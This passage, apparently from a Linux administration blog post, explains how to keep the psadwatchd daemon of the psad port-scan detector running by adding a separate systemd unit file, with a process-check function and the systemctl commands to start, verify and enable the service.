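# Sketch: check `ps -A` output (on stdin) for both psad and psadwatchd.
# Prints which daemon is missing; exits non-zero if either is absent.
check_psad_procs() {
  awk '
    $NF == "psad"       { psad = 1 }
    $NF == "psadwatchd" { watchd = 1 }
    END {
      if (!psad)   print "psad is not running"
      if (!watchd) print "psadwatchd is not running"
      exit !(psad && watchd)
    }'
}
```

<p>Run it as <code>ps -A | check_psad_procs</code>; a non-zero exit status means at least one of the two daemons is not running.</p>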
<p>The solution I came up with is very much a hack, but it works decently: I got around the problem by creating a separate systemd service for psadwatchd.</p>
<p>First, create a new file: <code>/etc/systemd/system/psadwatchd.service</code></p>
<p>In this file, write:</p>
<div class="highlight"><pre><span></span><code><span class="k">[Unit]</span>
<span class="na">Description</span><span class="o">=</span><span class="s">Port scan attack detector daemon</span>
<span class="na">After</span><span class="o">=</span><span class="s">psad.service</span>
<span class="k">[Service]</span>
<span class="na">ExecStart</span><span class="o">=</span><span class="s">/usr/sbin/psadwatchd</span>
<span class="na">Type</span><span class="o">=</span><span class="s">oneshot</span>
<span class="na">RemainAfterExit</span><span class="o">=</span><span class="s">yes</span>
<span class="k">[Install]</span>
<span class="na">WantedBy</span><span class="o">=</span><span class="s">multi-user.target</span>
</code></pre></div>
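<p>If you'd rather create the file from a script, the unit above can be written with a here-document. A sketch with a hypothetical function name; it has to run as root to write into <code>/etc/systemd/system</code>, and the target path is a parameter so the file can be written elsewhere for inspection:</p>

```shell
# Sketch: write the psadwatchd unit file shown above to $1
# (default: /etc/systemd/system/psadwatchd.service, which needs root).
write_psadwatchd_unit() {
  cat > "${1:-/etc/systemd/system/psadwatchd.service}" <<'EOF'
[Unit]
Description=Port scan attack detector daemon
After=psad.service
[Service]
ExecStart=/usr/sbin/psadwatchd
Type=oneshot
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
}
```

<p>After writing a new unit file, <code>sudo systemctl daemon-reload</code> makes systemd rescan its unit files.</p>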
<p>Next, confirm that you wrote this service file correctly by starting the service with systemctl:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>systemctl<span class="w"> </span>start<span class="w"> </span>psadwatchd
</code></pre></div>
<p>If all went well, you can now run the following two commands to check the result:</p>
<div class="highlight"><pre><span></span><code>ps<span class="w"> </span>-A<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span><span class="s2">"psad"</span>
sudo<span class="w"> </span>psad<span class="w"> </span>-S
</code></pre></div>
<p>The first command should return both a <code>psad</code> process and a <code>psadwatchd</code> process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.</p>
<p>Now that you have a working psadwatchd service file, enable the service so that systemd starts it at boot:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>systemctl<span class="w"> </span><span class="nb">enable</span><span class="w"> </span>psadwatchd
</code></pre></div>
<p>And that should be it (hopefully).</p>